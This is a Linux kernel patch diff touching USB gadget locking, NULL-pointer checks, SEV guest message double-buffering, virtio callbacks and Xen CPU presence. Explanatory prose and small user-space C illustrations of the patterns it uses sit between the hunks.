+@@ -4247,15 +4262,8 @@ static void dwc3_gadget_interrupt(struct dwc3 *dwc,
+ 		break;
+ 	case DWC3_DEVICE_EVENT_SUSPEND:
+ 		/* It changed to be suspend event for version 2.30a and above */
+-		if (!DWC3_VER_IS_PRIOR(DWC3, 230A)) {
+-			/*
+-			 * Ignore suspend event until the gadget enters into
+-			 * USB_STATE_CONFIGURED state.
+-			 */
+-			if (dwc->gadget->state >= USB_STATE_CONFIGURED)
+-				dwc3_gadget_suspend_interrupt(dwc,
+-						event->event_info);
+-		}
++		if (!DWC3_VER_IS_PRIOR(DWC3, 230A))
++			dwc3_gadget_suspend_interrupt(dwc, event->event_info);
+ 		break;
+ 	case DWC3_DEVICE_EVENT_SOF:
+ 	case DWC3_DEVICE_EVENT_ERRATIC_ERROR:
+diff --git a/drivers/usb/gadget/function/f_tcm.c b/drivers/usb/gadget/function/f_tcm.c
+index 658e2e21fdd0d..c21acebe8aae5 100644
+--- a/drivers/usb/gadget/function/f_tcm.c
++++ b/drivers/usb/gadget/function/f_tcm.c
+@@ -1054,7 +1054,7 @@ static void usbg_cmd_work(struct work_struct *work)
+ 				  tv_nexus->tvn_se_sess->se_tpg->se_tpg_tfo,
+ 				  tv_nexus->tvn_se_sess, cmd->data_len, DMA_NONE,
+ 				  cmd->prio_attr, cmd->sense_iu.sense,
+-				  cmd->unpacked_lun);
++				  cmd->unpacked_lun, NULL);
+ 		goto out;
+ 	}
+ 
+@@ -1183,7 +1183,7 @@ static void bot_cmd_work(struct work_struct *work)
+ 				  tv_nexus->tvn_se_sess->se_tpg->se_tpg_tfo,
+ 				  tv_nexus->tvn_se_sess, cmd->data_len, DMA_NONE,
+ 				  cmd->prio_attr, cmd->sense_iu.sense,
+-				  cmd->unpacked_lun);
++				  cmd->unpacked_lun, NULL);
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index 23b0629a87743..b14cbd0a6d013 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -37,6 +37,10 @@ static struct bus_type gadget_bus_type;
+  * @vbus: for udcs who care about vbus status, this value is real vbus status;
+  * for udcs who do not care about vbus status, this value is always true
+  * @started: the UDC's started state. True if the UDC had started.
++ * @connect_lock: protects udc->vbus, udc->started, gadget->connect, gadget->deactivate related
++ * functions. usb_gadget_connect_locked, usb_gadget_disconnect_locked,
++ * usb_udc_connect_control_locked, usb_gadget_udc_start_locked, usb_gadget_udc_stop_locked are
++ * called with this lock held.
+  *
+  * This represents the internal data structure which is used by the UDC-class
+  * to hold information about udc driver and gadget together.
+@@ -48,6 +52,7 @@ struct usb_udc {
+ 	struct list_head		list;
+ 	bool				vbus;
+ 	bool				started;
++	struct mutex			connect_lock;
+ };
+ 
+ static struct class *udc_class;
+@@ -660,17 +665,9 @@ out:
+ }
+ EXPORT_SYMBOL_GPL(usb_gadget_vbus_disconnect);
+ 
+-/**
+- * usb_gadget_connect - software-controlled connect to USB host
+- * @gadget:the peripheral being connected
+- *
+- * Enables the D+ (or potentially D-) pullup.  The host will start
+- * enumerating this gadget when the pullup is active and a VBUS session
+- * is active (the link is powered).
+- *
+- * Returns zero on success, else negative errno.
+- */
+-int usb_gadget_connect(struct usb_gadget *gadget)
++/* Internal version of usb_gadget_connect needs to be called with connect_lock held. */
++static int usb_gadget_connect_locked(struct usb_gadget *gadget)
++	__must_hold(&gadget->udc->connect_lock)
+ {
+ 	int ret = 0;
+ 
+@@ -679,10 +676,15 @@ int usb_gadget_connect(struct usb_gadget *gadget)
+ 		goto out;
+ 	}
+ 
+-	if (gadget->deactivated) {
++	if (gadget->connected)
++		goto out;
++
++	if (gadget->deactivated || !gadget->udc->started) {
+ 		/*
+ 		 * If gadget is deactivated we only save new state.
+ 		 * Gadget will be connected automatically after activation.
++		 *
++		 * udc first needs to be started before gadget can be pulled up.
+ 		 */
+ 		gadget->connected = true;
+ 		goto out;
+@@ -697,22 +699,32 @@ out:
+ 
+ 	return ret;
+ }
+-EXPORT_SYMBOL_GPL(usb_gadget_connect);
+ 
+ /**
+- * usb_gadget_disconnect - software-controlled disconnect from USB host
+- * @gadget:the peripheral being disconnected
+- *
+- * Disables the D+ (or potentially D-) pullup, which the host may see
+- * as a disconnect (when a VBUS session is active).  Not all systems
+- * support software pullup controls.
++ * usb_gadget_connect - software-controlled connect to USB host
++ * @gadget:the peripheral being connected
+  *
+- * Following a successful disconnect, invoke the ->disconnect() callback
+- * for the current gadget driver so that UDC drivers don't need to.
++ * Enables the D+ (or potentially D-) pullup.  The host will start
++ * enumerating this gadget when the pullup is active and a VBUS session
++ * is active (the link is powered).
+  *
+  * Returns zero on success, else negative errno.
+  */
+-int usb_gadget_disconnect(struct usb_gadget *gadget)
++int usb_gadget_connect(struct usb_gadget *gadget)
++{
++	int ret;
++
++	mutex_lock(&gadget->udc->connect_lock);
++	ret = usb_gadget_connect_locked(gadget);
++	mutex_unlock(&gadget->udc->connect_lock);
++
++	return ret;
++}
++EXPORT_SYMBOL_GPL(usb_gadget_connect);
++
++/* Internal version of usb_gadget_disconnect needs to be called with connect_lock held. */
++static int usb_gadget_disconnect_locked(struct usb_gadget *gadget)
++	__must_hold(&gadget->udc->connect_lock)
+ {
+ 	int ret = 0;
+ 
+@@ -724,10 +736,12 @@ int usb_gadget_disconnect(struct usb_gadget *gadget)
+ 	if (!gadget->connected)
+ 		goto out;
+ 
+-	if (gadget->deactivated) {
++	if (gadget->deactivated || !gadget->udc->started) {
+ 		/*
+ 		 * If gadget is deactivated we only save new state.
+ 		 * Gadget will stay disconnected after activation.
++		 *
++		 * udc should have been started before gadget being pulled down.
+ 		 */
+ 		gadget->connected = false;
+ 		goto out;
+@@ -747,6 +761,30 @@ out:
+ 
+ 	return ret;
+ }
++
++/**
++ * usb_gadget_disconnect - software-controlled disconnect from USB host
++ * @gadget:the peripheral being disconnected
++ *
++ * Disables the D+ (or potentially D-) pullup, which the host may see
++ * as a disconnect (when a VBUS session is active).  Not all systems
++ * support software pullup controls.
++ *
++ * Following a successful disconnect, invoke the ->disconnect() callback
++ * for the current gadget driver so that UDC drivers don't need to.
++ *
++ * Returns zero on success, else negative errno.
++ */
++int usb_gadget_disconnect(struct usb_gadget *gadget)
++{
++	int ret;
++
++	mutex_lock(&gadget->udc->connect_lock);
++	ret = usb_gadget_disconnect_locked(gadget);
++	mutex_unlock(&gadget->udc->connect_lock);
++
++	return ret;
++}
+ EXPORT_SYMBOL_GPL(usb_gadget_disconnect);
+ 
+ /**
+@@ -767,10 +805,11 @@ int usb_gadget_deactivate(struct usb_gadget *gadget)
+ 	if (gadget->deactivated)
+ 		goto out;
+ 
++	mutex_lock(&gadget->udc->connect_lock);
+ 	if (gadget->connected) {
+-		ret = usb_gadget_disconnect(gadget);
++		ret = usb_gadget_disconnect_locked(gadget);
+ 		if (ret)
+-			goto out;
++			goto unlock;
+ 
+ 		/*
+ 		 * If gadget was being connected before deactivation, we want
+@@ -780,6 +819,8 @@ int usb_gadget_deactivate(struct usb_gadget *gadget)
+ 	}
+ 	gadget->deactivated = true;
+ 
++unlock:
++	mutex_unlock(&gadget->udc->connect_lock);
+ out:
+ 	trace_usb_gadget_deactivate(gadget, ret);
+ 
+@@ -803,6 +844,7 @@ int usb_gadget_activate(struct usb_gadget *gadget)
+ 	if (!gadget->deactivated)
+ 		goto out;
+ 
++	mutex_lock(&gadget->udc->connect_lock);
+ 	gadget->deactivated = false;
+ 
+ 	/*
+@@ -810,7 +852,8 @@ int usb_gadget_activate(struct usb_gadget *gadget)
+ 	 * while it was being deactivated, we call usb_gadget_connect().
+ 	 */
+ 	if (gadget->connected)
+-		ret = usb_gadget_connect(gadget);
++		ret = usb_gadget_connect_locked(gadget);
++	mutex_unlock(&gadget->udc->connect_lock);
+ 
+ out:
+ 	trace_usb_gadget_activate(gadget, ret);
+@@ -1051,12 +1094,13 @@ EXPORT_SYMBOL_GPL(usb_gadget_set_state);
+ 
+ /* ------------------------------------------------------------------------- */
+ 
+-static void usb_udc_connect_control(struct usb_udc *udc)
++/* Acquire connect_lock before calling this function. */
++static void usb_udc_connect_control_locked(struct usb_udc *udc) __must_hold(&udc->connect_lock)
+ {
+-	if (udc->vbus)
+-		usb_gadget_connect(udc->gadget);
++	if (udc->vbus && udc->started)
++		usb_gadget_connect_locked(udc->gadget);
+ 	else
+-		usb_gadget_disconnect(udc->gadget);
++		usb_gadget_disconnect_locked(udc->gadget);
+ }
+ 
+ /**
+@@ -1072,10 +1116,12 @@ void usb_udc_vbus_handler(struct usb_gadget *gadget, bool status)
+ {
+ 	struct usb_udc *udc = gadget->udc;
+ 
++	mutex_lock(&udc->connect_lock);
+ 	if (udc) {
+ 		udc->vbus = status;
+-		usb_udc_connect_control(udc);
++		usb_udc_connect_control_locked(udc);
+ 	}
++	mutex_unlock(&udc->connect_lock);
+ }
+ EXPORT_SYMBOL_GPL(usb_udc_vbus_handler);
+ 
+@@ -1097,7 +1143,7 @@ void usb_gadget_udc_reset(struct usb_gadget *gadget,
+ EXPORT_SYMBOL_GPL(usb_gadget_udc_reset);
+ 
+ /**
+- * usb_gadget_udc_start - tells usb device controller to start up
++ * usb_gadget_udc_start_locked - tells usb device controller to start up
+  * @udc: The UDC to be started
+  *
+  * This call is issued by the UDC Class driver when it's about
+@@ -1108,8 +1154,11 @@ EXPORT_SYMBOL_GPL(usb_gadget_udc_reset);
+  * necessary to have it powered on.
+  *
+  * Returns zero on success, else negative errno.
++ *
++ * Caller should acquire connect_lock before invoking this function.
+  */
+-static inline int usb_gadget_udc_start(struct usb_udc *udc)
++static inline int usb_gadget_udc_start_locked(struct usb_udc *udc)
++	__must_hold(&udc->connect_lock)
+ {
+ 	int ret;
+ 
+@@ -1126,7 +1175,7 @@ static inline int usb_gadget_udc_start(struct usb_udc *udc)
+ }
+ 
+ /**
+- * usb_gadget_udc_stop - tells usb device controller we don't need it anymore
++ * usb_gadget_udc_stop_locked - tells usb device controller we don't need it anymore
+  * @udc: The UDC to be stopped
+  *
+  * This call is issued by the UDC Class driver after calling
+@@ -1135,8 +1184,11 @@ static inline int usb_gadget_udc_start(struct usb_udc *udc)
+  * The details are implementation specific, but it can go as
+  * far as powering off UDC completely and disable its data
+  * line pullups.
++ *
++ * Caller should acquire connect_lock before invoking this function.
+  */
+-static inline void usb_gadget_udc_stop(struct usb_udc *udc)
++static inline void usb_gadget_udc_stop_locked(struct usb_udc *udc)
++	__must_hold(&udc->connect_lock)
+ {
+ 	if (!udc->started) {
+ 		dev_err(&udc->dev, "UDC had already stopped\n");
+@@ -1295,6 +1347,7 @@ int usb_add_gadget(struct usb_gadget *gadget)
+ 
+ 	udc->gadget = gadget;
+ 	gadget->udc = udc;
++	mutex_init(&udc->connect_lock);
+ 
+ 	udc->started = false;
+ 
+@@ -1496,11 +1549,15 @@ static int gadget_bind_driver(struct device *dev)
+ 	if (ret)
+ 		goto err_bind;
+ 
+-	ret = usb_gadget_udc_start(udc);
+-	if (ret)
++	mutex_lock(&udc->connect_lock);
++	ret = usb_gadget_udc_start_locked(udc);
++	if (ret) {
++		mutex_unlock(&udc->connect_lock);
+ 		goto err_start;
++	}
+ 	usb_gadget_enable_async_callbacks(udc);
+-	usb_udc_connect_control(udc);
++	usb_udc_connect_control_locked(udc);
++	mutex_unlock(&udc->connect_lock);
+ 
+ 	kobject_uevent(&udc->dev.kobj, KOBJ_CHANGE);
+ 	return 0;
+@@ -1531,12 +1588,14 @@ static void gadget_unbind_driver(struct device *dev)
+ 
+ 	kobject_uevent(&udc->dev.kobj, KOBJ_CHANGE);
+ 
+-	usb_gadget_disconnect(gadget);
++	mutex_lock(&udc->connect_lock);
++	usb_gadget_disconnect_locked(gadget);
+ 	usb_gadget_disable_async_callbacks(udc);
+ 	if (gadget->irq)
+ 		synchronize_irq(gadget->irq);
+ 	udc->driver->unbind(gadget);
+-	usb_gadget_udc_stop(udc);
++	usb_gadget_udc_stop_locked(udc);
++	mutex_unlock(&udc->connect_lock);
+ 
+ 	mutex_lock(&udc_lock);
+ 	driver->is_bound = false;
+@@ -1622,11 +1681,15 @@ static ssize_t soft_connect_store(struct device *dev,
+ 	}
+ 
+ 	if (sysfs_streq(buf, "connect")) {
+-		usb_gadget_udc_start(udc);
+-		usb_gadget_connect(udc->gadget);
++		mutex_lock(&udc->connect_lock);
++		usb_gadget_udc_start_locked(udc);
++		usb_gadget_connect_locked(udc->gadget);
++		mutex_unlock(&udc->connect_lock);
+ 	} else if (sysfs_streq(buf, "disconnect")) {
+-		usb_gadget_disconnect(udc->gadget);
+-		usb_gadget_udc_stop(udc);
++		mutex_lock(&udc->connect_lock);
++		usb_gadget_disconnect_locked(udc->gadget);
++		usb_gadget_udc_stop_locked(udc);
++		mutex_unlock(&udc->connect_lock);
+ 	} else {
+ 		dev_err(dev, "unsupported command '%s'\n", buf);
+ 		ret = -EINVAL;
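
The udc/core.c hunks above all follow one pattern: each exported entry point now takes the new per-UDC connect_lock and delegates to a _locked variant annotated with __must_hold(), so composite operations such as usb_gadget_deactivate() can hold the mutex once and call the _locked helpers without self-deadlock. A minimal user-space sketch of that pattern (illustration only; pthread mutexes stand in for the kernel's struct mutex and the gadget type is simplified):

#include <pthread.h>
#include <stdbool.h>
#include <stdio.h>

struct gadget {
	pthread_mutex_t connect_lock;
	bool connected;
};

/* Locked variant: the caller must already hold connect_lock. */
static int gadget_connect_locked(struct gadget *g)
{
	if (g->connected)
		return 0;
	g->connected = true;	/* the real driver would pull up D+ here */
	return 0;
}

/* Public entry point: take the lock, delegate to the locked variant. */
static int gadget_connect(struct gadget *g)
{
	int ret;

	pthread_mutex_lock(&g->connect_lock);
	ret = gadget_connect_locked(g);
	pthread_mutex_unlock(&g->connect_lock);
	return ret;
}

int main(void)
{
	struct gadget g = { .connect_lock = PTHREAD_MUTEX_INITIALIZER };
	int ret = gadget_connect(&g);

	printf("connect: %d, connected=%d\n", ret, (int)g.connected);
	return 0;
}
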
+diff --git a/drivers/usb/gadget/udc/renesas_usb3.c b/drivers/usb/gadget/udc/renesas_usb3.c
+index 615ba0a6fbee1..32c9e369216c9 100644
+--- a/drivers/usb/gadget/udc/renesas_usb3.c
++++ b/drivers/usb/gadget/udc/renesas_usb3.c
+@@ -2596,6 +2596,7 @@ static int renesas_usb3_remove(struct platform_device *pdev)
+ 	debugfs_remove_recursive(usb3->dentry);
+ 	device_remove_file(&pdev->dev, &dev_attr_role);
+ 
++	cancel_work_sync(&usb3->role_work);
+ 	usb_role_switch_unregister(usb3->role_sw);
+ 
+ 	usb_del_gadget_udc(&usb3->gadget);
+diff --git a/drivers/usb/gadget/udc/tegra-xudc.c b/drivers/usb/gadget/udc/tegra-xudc.c
+index 76919d7570d23..3c7ffb35c35cd 100644
+--- a/drivers/usb/gadget/udc/tegra-xudc.c
++++ b/drivers/usb/gadget/udc/tegra-xudc.c
+@@ -2160,7 +2160,7 @@ static int tegra_xudc_gadget_vbus_draw(struct usb_gadget *gadget,
+ 
+ 	dev_dbg(xudc->dev, "%s: %u mA\n", __func__, m_a);
+ 
+-	if (xudc->curr_usbphy->chg_type == SDP_TYPE)
++	if (xudc->curr_usbphy && xudc->curr_usbphy->chg_type == SDP_TYPE)
+ 		ret = usb_phy_set_power(xudc->curr_usbphy, m_a);
+ 
+ 	return ret;
+diff --git a/drivers/usb/host/xhci-debugfs.c b/drivers/usb/host/xhci-debugfs.c
+index dc832ddf7033f..bd40caeeb21c6 100644
+--- a/drivers/usb/host/xhci-debugfs.c
++++ b/drivers/usb/host/xhci-debugfs.c
+@@ -133,6 +133,7 @@ static void xhci_debugfs_regset(struct xhci_hcd *xhci, u32 base,
+ 	regset->regs = regs;
+ 	regset->nregs = nregs;
+ 	regset->base = hcd->regs + base;
++	regset->dev = hcd->self.controller;
+ 
+ 	debugfs_create_regset32((const char *)rgs->name, 0444, parent, regset);
+ }
+diff --git a/drivers/usb/host/xhci-rcar.c b/drivers/usb/host/xhci-rcar.c
+index aef0258a7160d..98525704be9d4 100644
+--- a/drivers/usb/host/xhci-rcar.c
++++ b/drivers/usb/host/xhci-rcar.c
+@@ -75,7 +75,6 @@ MODULE_FIRMWARE(XHCI_RCAR_FIRMWARE_NAME_V3);
+ 
+ /* For soc_device_attribute */
+ #define RCAR_XHCI_FIRMWARE_V2   BIT(0) /* FIRMWARE V2 */
+-#define RCAR_XHCI_FIRMWARE_V3   BIT(1) /* FIRMWARE V3 */
+ 
+ static const struct soc_device_attribute rcar_quirks_match[]  = {
+ 	{
+@@ -147,8 +146,6 @@ static int xhci_rcar_download_firmware(struct usb_hcd *hcd)
+ 
+ 	if (quirks & RCAR_XHCI_FIRMWARE_V2)
+ 		firmware_name = XHCI_RCAR_FIRMWARE_NAME_V2;
+-	else if (quirks & RCAR_XHCI_FIRMWARE_V3)
+-		firmware_name = XHCI_RCAR_FIRMWARE_NAME_V3;
+ 	else
+ 		firmware_name = priv->firmware_name;
+ 
+diff --git a/drivers/usb/mtu3/mtu3_qmu.c b/drivers/usb/mtu3/mtu3_qmu.c
+index 2ea3157ddb6e2..e65586147965d 100644
+--- a/drivers/usb/mtu3/mtu3_qmu.c
++++ b/drivers/usb/mtu3/mtu3_qmu.c
+@@ -210,6 +210,7 @@ static struct qmu_gpd *advance_enq_gpd(struct mtu3_gpd_ring *ring)
+ 	return ring->enqueue;
+ }
+ 
++/* @dequeue may be NULL if ring is unallocated or freed */
+ static struct qmu_gpd *advance_deq_gpd(struct mtu3_gpd_ring *ring)
+ {
+ 	if (ring->dequeue < ring->end)
+@@ -484,7 +485,7 @@ static void qmu_done_tx(struct mtu3 *mtu, u8 epnum)
+ 	dev_dbg(mtu->dev, "%s EP%d, last=%p, current=%p, enq=%p\n",
+ 		__func__, epnum, gpd, gpd_current, ring->enqueue);
+ 
+-	while (gpd != gpd_current && !GET_GPD_HWO(gpd)) {
++	while (gpd && gpd != gpd_current && !GET_GPD_HWO(gpd)) {
+ 
+ 		mreq = next_request(mep);
+ 
+@@ -523,7 +524,7 @@ static void qmu_done_rx(struct mtu3 *mtu, u8 epnum)
+ 	dev_dbg(mtu->dev, "%s EP%d, last=%p, current=%p, enq=%p\n",
+ 		__func__, epnum, gpd, gpd_current, ring->enqueue);
+ 
+-	while (gpd != gpd_current && !GET_GPD_HWO(gpd)) {
++	while (gpd && gpd != gpd_current && !GET_GPD_HWO(gpd)) {
+ 
+ 		mreq = next_request(mep);
+ 
+diff --git a/drivers/vhost/vdpa.c b/drivers/vhost/vdpa.c
+index b7657984dd8df..6f532da59e08a 100644
+--- a/drivers/vhost/vdpa.c
++++ b/drivers/vhost/vdpa.c
+@@ -819,11 +819,7 @@ static void vhost_vdpa_unmap(struct vhost_vdpa *v,
+ 		if (!v->in_batch)
+ 			ops->set_map(vdpa, asid, iotlb);
+ 	}
+-	/* If we are in the middle of batch processing, delay the free
+-	 * of AS until BATCH_END.
+-	 */
+-	if (!v->in_batch && !iotlb->nmaps)
+-		vhost_vdpa_remove_as(v, asid);
++
+ }
+ 
+ static int vhost_vdpa_va_map(struct vhost_vdpa *v,
+@@ -1080,8 +1076,6 @@ static int vhost_vdpa_process_iotlb_msg(struct vhost_dev *dev, u32 asid,
+ 		if (v->in_batch && ops->set_map)
+ 			ops->set_map(vdpa, asid, iotlb);
+ 		v->in_batch = false;
+-		if (!iotlb->nmaps)
+-			vhost_vdpa_remove_as(v, asid);
+ 		break;
+ 	default:
+ 		r = -EINVAL;
+diff --git a/drivers/video/fbdev/mmp/hw/mmp_ctrl.c b/drivers/video/fbdev/mmp/hw/mmp_ctrl.c
+index a9df8ee798102..51fbf02a03430 100644
+--- a/drivers/video/fbdev/mmp/hw/mmp_ctrl.c
++++ b/drivers/video/fbdev/mmp/hw/mmp_ctrl.c
+@@ -514,9 +514,9 @@ static int mmphw_probe(struct platform_device *pdev)
+ 	/* get clock */
+ 	ctrl->clk = devm_clk_get(ctrl->dev, mi->clk_name);
+ 	if (IS_ERR(ctrl->clk)) {
++		ret = PTR_ERR(ctrl->clk);
+ 		dev_err_probe(ctrl->dev, ret,
+ 			      "unable to get clk %s\n", mi->clk_name);
+-		ret = -ENOENT;
+ 		goto failed;
+ 	}
+ 	clk_prepare_enable(ctrl->clk);
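
The mmp_ctrl.c fix reorders the error path so the errno embedded in the error pointer is captured before it is logged and returned, instead of being clobbered with -ENOENT afterwards. A standalone sketch of the ERR_PTR convention involved (the macros below are user-space stand-ins, not the kernel definitions):

#include <errno.h>
#include <stdio.h>

/* User-space stand-ins for the kernel's ERR_PTR()/IS_ERR()/PTR_ERR(). */
#define ERR_PTR(err)	((void *)(long)(err))
#define IS_ERR(ptr)	((unsigned long)(ptr) >= (unsigned long)-4095)
#define PTR_ERR(ptr)	((long)(ptr))

/* Pretend clock lookup that fails with a specific errno. */
static void *get_clk(void)
{
	return ERR_PTR(-ENODEV);
}

int main(void)
{
	void *clk = get_clk();
	long ret = 0;

	if (IS_ERR(clk)) {
		/* Capture the real cause first, then report that same value. */
		ret = PTR_ERR(clk);
		fprintf(stderr, "unable to get clk: %ld\n", ret);
	}
	return ret ? 1 : 0;
}
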
+diff --git a/drivers/virt/coco/sev-guest/sev-guest.c b/drivers/virt/coco/sev-guest/sev-guest.c
+index 46f1a8d558b0b..0c7b47acba2a8 100644
+--- a/drivers/virt/coco/sev-guest/sev-guest.c
++++ b/drivers/virt/coco/sev-guest/sev-guest.c
+@@ -46,7 +46,15 @@ struct snp_guest_dev {
+ 
+ 	void *certs_data;
+ 	struct snp_guest_crypto *crypto;
++	/* request and response are in unencrypted memory */
+ 	struct snp_guest_msg *request, *response;
++
++	/*
++	 * Avoid information leakage by double-buffering shared messages
++	 * in fields that are in regular encrypted memory.
++	 */
++	struct snp_guest_msg secret_request, secret_response;
++
+ 	struct snp_secrets_page_layout *layout;
+ 	struct snp_req_data input;
+ 	u32 *os_area_msg_seqno;
+@@ -266,14 +274,17 @@ static int dec_payload(struct snp_guest_dev *snp_dev, struct snp_guest_msg *msg,
+ static int verify_and_dec_payload(struct snp_guest_dev *snp_dev, void *payload, u32 sz)
+ {
+ 	struct snp_guest_crypto *crypto = snp_dev->crypto;
+-	struct snp_guest_msg *resp = snp_dev->response;
+-	struct snp_guest_msg *req = snp_dev->request;
++	struct snp_guest_msg *resp = &snp_dev->secret_response;
++	struct snp_guest_msg *req = &snp_dev->secret_request;
+ 	struct snp_guest_msg_hdr *req_hdr = &req->hdr;
+ 	struct snp_guest_msg_hdr *resp_hdr = &resp->hdr;
+ 
+ 	dev_dbg(snp_dev->dev, "response [seqno %lld type %d version %d sz %d]\n",
+ 		resp_hdr->msg_seqno, resp_hdr->msg_type, resp_hdr->msg_version, resp_hdr->msg_sz);
+ 
++	/* Copy response from shared memory to encrypted memory. */
++	memcpy(resp, snp_dev->response, sizeof(*resp));
++
+ 	/* Verify that the sequence counter is incremented by 1 */
+ 	if (unlikely(resp_hdr->msg_seqno != (req_hdr->msg_seqno + 1)))
+ 		return -EBADMSG;
+@@ -297,7 +308,7 @@ static int verify_and_dec_payload(struct snp_guest_dev *snp_dev, void *payload,
+ static int enc_payload(struct snp_guest_dev *snp_dev, u64 seqno, int version, u8 type,
+ 			void *payload, size_t sz)
+ {
+-	struct snp_guest_msg *req = snp_dev->request;
++	struct snp_guest_msg *req = &snp_dev->secret_request;
+ 	struct snp_guest_msg_hdr *hdr = &req->hdr;
+ 
+ 	memset(req, 0, sizeof(*req));
+@@ -417,13 +428,21 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 	if (!seqno)
+ 		return -EIO;
+ 
++	/* Clear shared memory's response for the host to populate. */
+ 	memset(snp_dev->response, 0, sizeof(struct snp_guest_msg));
+ 
+-	/* Encrypt the userspace provided payload */
++	/* Encrypt the userspace provided payload in snp_dev->secret_request. */
+ 	rc = enc_payload(snp_dev, seqno, msg_ver, type, req_buf, req_sz);
+ 	if (rc)
+ 		return rc;
+ 
++	/*
++	 * Write the fully encrypted request to the shared unencrypted
++	 * request page.
++	 */
++	memcpy(snp_dev->request, &snp_dev->secret_request,
++	       sizeof(snp_dev->secret_request));
++
+ 	rc = __handle_guest_request(snp_dev, exit_code, fw_err);
+ 	if (rc) {
+ 		if (rc == -EIO && *fw_err == SNP_GUEST_REQ_INVALID_LEN)
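
The sev-guest hunks introduce double-buffering: messages are built and verified only in guest-private (encrypted) memory, and a single memcpy() publishes or snapshots them in the host-shared page, so the host cannot mutate a message between validation and use. A toy illustration of that flow (assumed buffer layout, not the driver's real structures):

#include <stdio.h>
#include <string.h>

#define MSG_SZ 64

/* Shared page: the untrusted host can read/write this at any time. */
static char shared_req[MSG_SZ], shared_resp[MSG_SZ];

/* Private (guest-encrypted) buffers: the host cannot observe these. */
static char secret_req[MSG_SZ], secret_resp[MSG_SZ];

static void host_handle(void)
{
	/* Host consumes the request and fills in a response. */
	snprintf(shared_resp, MSG_SZ, "resp:%s", shared_req);
}

int main(void)
{
	/* 1. Build (and, in the real driver, encrypt) in private memory. */
	snprintf(secret_req, MSG_SZ, "report-request");

	/* 2. Publish the finished message to shared memory in one copy. */
	memcpy(shared_req, secret_req, MSG_SZ);
	host_handle();

	/* 3. Snapshot the response before validating it, so the host
	 *    cannot change it between the check and the use.
	 */
	memcpy(secret_resp, shared_resp, MSG_SZ);
	printf("validated against snapshot: %s\n", secret_resp);
	return 0;
}
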
+diff --git a/drivers/virtio/virtio_ring.c b/drivers/virtio/virtio_ring.c
+index 723c4e29e1d3b..5bee2ab62111b 100644
+--- a/drivers/virtio/virtio_ring.c
++++ b/drivers/virtio/virtio_ring.c
+@@ -848,6 +848,14 @@ static void virtqueue_disable_cb_split(struct virtqueue *_vq)
+ 
+ 	if (!(vq->split.avail_flags_shadow & VRING_AVAIL_F_NO_INTERRUPT)) {
+ 		vq->split.avail_flags_shadow |= VRING_AVAIL_F_NO_INTERRUPT;
++
++		/*
++		 * If device triggered an event already it won't trigger one again:
++		 * no need to disable.
++		 */
++		if (vq->event_triggered)
++			return;
++
+ 		if (vq->event)
+ 			/* TODO: this is a hack. Figure out a cleaner value to write. */
+ 			vring_used_event(&vq->split.vring) = 0x0;
+@@ -1687,6 +1695,14 @@ static void virtqueue_disable_cb_packed(struct virtqueue *_vq)
+ 
+ 	if (vq->packed.event_flags_shadow != VRING_PACKED_EVENT_FLAG_DISABLE) {
+ 		vq->packed.event_flags_shadow = VRING_PACKED_EVENT_FLAG_DISABLE;
++
++		/*
++		 * If device triggered an event already it won't trigger one again:
++		 * no need to disable.
++		 */
++		if (vq->event_triggered)
++			return;
++
+ 		vq->packed.vring.driver->flags =
+ 			cpu_to_le16(vq->packed.event_flags_shadow);
+ 	}
+@@ -2309,12 +2325,6 @@ void virtqueue_disable_cb(struct virtqueue *_vq)
+ {
+ 	struct vring_virtqueue *vq = to_vvq(_vq);
+ 
+-	/* If device triggered an event already it won't trigger one again:
+-	 * no need to disable.
+-	 */
+-	if (vq->event_triggered)
+-		return;
+-
+ 	if (vq->packed_ring)
+ 		virtqueue_disable_cb_packed(_vq);
+ 	else
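
The virtio_ring change moves the event_triggered early-return from virtqueue_disable_cb() into the per-layout helpers, after the shadow flag update: the driver-side state stays coherent while the device-visible write is still skipped when an interrupt has already fired. A compact model of that ordering (simplified flags, illustration only):

#include <stdbool.h>
#include <stdio.h>

struct vq {
	bool event_triggered;	/* device already fired an interrupt */
	int flags_shadow;	/* driver-side copy of the event flags */
	int device_flags;	/* what the device actually sees */
};

#define FLAG_NO_INTERRUPT 1

static void disable_cb(struct vq *vq)
{
	if (!(vq->flags_shadow & FLAG_NO_INTERRUPT)) {
		/* Always keep the shadow coherent... */
		vq->flags_shadow |= FLAG_NO_INTERRUPT;

		/* ...but skip the device-visible write when an event was
		 * already delivered: it won't fire again anyway.
		 */
		if (vq->event_triggered)
			return;

		vq->device_flags = vq->flags_shadow;
	}
}

int main(void)
{
	struct vq vq = { .event_triggered = true };

	disable_cb(&vq);
	printf("shadow=%d device=%d\n", vq.flags_shadow, vq.device_flags);
	return 0;
}
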
+diff --git a/drivers/xen/pcpu.c b/drivers/xen/pcpu.c
+index fd3a644b08559..b3e3d1bb37f3e 100644
+--- a/drivers/xen/pcpu.c
++++ b/drivers/xen/pcpu.c
+@@ -58,6 +58,7 @@ struct pcpu {
+ 	struct list_head list;
+ 	struct device dev;
+ 	uint32_t cpu_id;
++	uint32_t acpi_id;
+ 	uint32_t flags;
+ };
+ 
+@@ -249,6 +250,7 @@ static struct pcpu *create_and_register_pcpu(struct xenpf_pcpuinfo *info)
+ 
+ 	INIT_LIST_HEAD(&pcpu->list);
+ 	pcpu->cpu_id = info->xen_cpuid;
++	pcpu->acpi_id = info->acpi_id;
+ 	pcpu->flags = info->flags;
+ 
+ 	/* Need hold on xen_pcpu_lock before pcpu list manipulations */
+@@ -381,3 +383,21 @@ err1:
+ 	return ret;
+ }
+ arch_initcall(xen_pcpu_init);
++
++#ifdef CONFIG_ACPI
++bool __init xen_processor_present(uint32_t acpi_id)
++{
++	const struct pcpu *pcpu;
++	bool online = false;
++
++	mutex_lock(&xen_pcpu_lock);
++	list_for_each_entry(pcpu, &xen_pcpus, list)
++		if (pcpu->acpi_id == acpi_id) {
++			online = pcpu->flags & XEN_PCPU_FLAGS_ONLINE;
++			break;
++		}
++	mutex_unlock(&xen_pcpu_lock);
++
++	return online;
++}
++#endif
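
xen_processor_present() is a straightforward lookup under xen_pcpu_lock, keyed by the newly stored acpi_id, returning whether that physical CPU is flagged online. The same shape in plain C, with a singly linked list and a pthread mutex standing in for list_head and the kernel mutex:

#include <pthread.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define FLAG_ONLINE 0x1

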